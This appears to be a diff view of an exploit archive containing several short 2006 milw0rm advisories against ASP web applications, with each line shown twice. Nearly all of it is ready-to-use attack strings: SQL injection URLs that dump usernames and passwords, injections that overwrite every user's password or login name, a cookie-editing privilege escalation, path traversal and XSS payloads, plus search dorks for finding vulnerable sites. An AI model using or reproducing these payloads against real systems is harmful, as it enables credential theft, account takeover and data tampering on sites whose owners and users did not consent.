# Title : basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability # Title : basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar # Author : bolivar
# Dork : "This script created by www.script.canavari.com" # Dork : "This script created by www.script.canavari.com"
--------------------------------------------------------------------------- ---------------------------------------------------------------------------
http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler
--------------------------------------------------------------------------- ---------------------------------------------------------------------------
# Just for Fun!! # Just for Fun!!
# milw0rm.com [2006-11-25] # milw0rm.com [2006-11-25]

64
platforms/asp/webapps/2849.txt
View file

@ -1,32 +1,32 @@
************************************************************************************************** **************************************************************************************************
# Title : ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability # Title : ASP-Nuke Community <= v1.5 Cookie Modification Privilege Escalation Vulnerability
# Author : ajann # Author : ajann
# S.Page : http://www.rot.dk # S.Page : http://www.rot.dk
# D.Page : http://www.rot.dk/aspnuke/downloads.asp # D.Page : http://www.rot.dk/aspnuke/downloads.asp
# Greetz : Nukedx # Greetz : Nukedx
************************************************************************************************** **************************************************************************************************
Cookie Cookie
---------- ----------
Open the Cookie Editor=> Open the Cookie Editor=>
Find cookie informations. Find cookie informations.
Change Informations= Change Informations=
Cookie Informations: Cookie Informations:
ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for ASPNUKE14%5Fpseudoname , pseudoname => "Welcome *USERNAME*" see for
ASPNUKE14%5Fpseudo , pseudo => Login UserName ASPNUKE14%5Fpseudo , pseudo => Login UserName
ASPNUKE14%5Fpseudoid , pseudoid => UserId ASPNUKE14%5Fpseudoid , pseudoid => UserId
ASPNUKE14%5Femail , email => User Email ASPNUKE14%5Femail , email => User Email
Save and go to default.asp. Save and go to default.asp.
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-25] # milw0rm.com [2006-11-25]

24
platforms/asp/webapps/2853.txt
View file

@ -1,12 +1,12 @@
# Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability # Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar # Author : bolivar
# Dork : "SimpleBlog 2.3 by 8pixel.net" # Dork : "SimpleBlog 2.3 by 8pixel.net"
--------------------------------------------------------------------------- ---------------------------------------------------------------------------
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
--------------------------------------------------------------------------- ---------------------------------------------------------------------------
# Just for Fun!! # Just for Fun!!
# milw0rm.com [2006-11-26] # milw0rm.com [2006-11-26]

78
platforms/asp/webapps/2881.txt
View file

@ -1,39 +1,39 @@
******************************************************************************* *******************************************************************************
# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities # Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
******************************************************************************* *******************************************************************************
Login Before Vulnerabilities.: Login Before Vulnerabilities.:
[[SOURCE]]]------------------------------------------------------ [[SOURCE]]]------------------------------------------------------
http://[target]/[path]//getfile.asp?filename=[SQL] http://[target]/[path]//getfile.asp?filename=[SQL]
Example: Example:
//getfile.asp?filename=../index.asp //getfile.asp?filename=../index.asp
//getfile.asp?filename=../../../boot.ini //getfile.asp?filename=../../../boot.ini
[[/SOURCE]]] [[/SOURCE]]]
[[XSS]]]--------------------------------------------------------- [[XSS]]]---------------------------------------------------------
http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS] http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]
Example: Example:
//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E //index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E
[[/XSS]]] [[/XSS]]]
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-12-01] # milw0rm.com [2006-12-01]

56
platforms/asp/webapps/2907.txt
View file

@ -1,28 +1,28 @@
************************************************************************************* *************************************************************************************
# Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability # Title : SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
# $$$ : $2,499 # $$$ : $2,499
************************************************************************************* *************************************************************************************
[[SQL]]] [[SQL]]]
###http://[target]/[path]//login.asp=[POST SQL] ###http://[target]/[path]//login.asp=[POST SQL]
Example: Example:
-> All User UserName And Password Changed "kro" -> All User UserName And Password Changed "kro"
// login.asp UserName: ';update login set password='kro'-- // login.asp UserName: ';update login set password='kro'--
// login.asp UserName: ';update login set loginName='kro'-- // login.asp UserName: ';update login set loginName='kro'--
[[/SQL]]] [[/SQL]]]
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-12-09] # milw0rm.com [2006-12-09]

60
platforms/asp/webapps/2908.txt
View file

@ -1,30 +1,30 @@
************************************************************************************* *************************************************************************************
# Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability # Title : Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
# $$$ : $8,000 # $$$ : $8,000
************************************************************************************* *************************************************************************************
[[SQL]]] [[SQL]]]
###http://[target]/[path]//ProductDetails.asp=[SQL] ###http://[target]/[path]//ProductDetails.asp=[SQL]
Example: Example:
-> All News Title Changed to = "kro" -> All News Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'-- //ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--
-> Just NewsId Title Changed to = "kro" -> Just NewsId Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2-- //ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--
[[/SQL]]] [[/SQL]]]
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-12-09] # milw0rm.com [2006-12-09]

Some files were not shown because too many files have changed in this diff Show more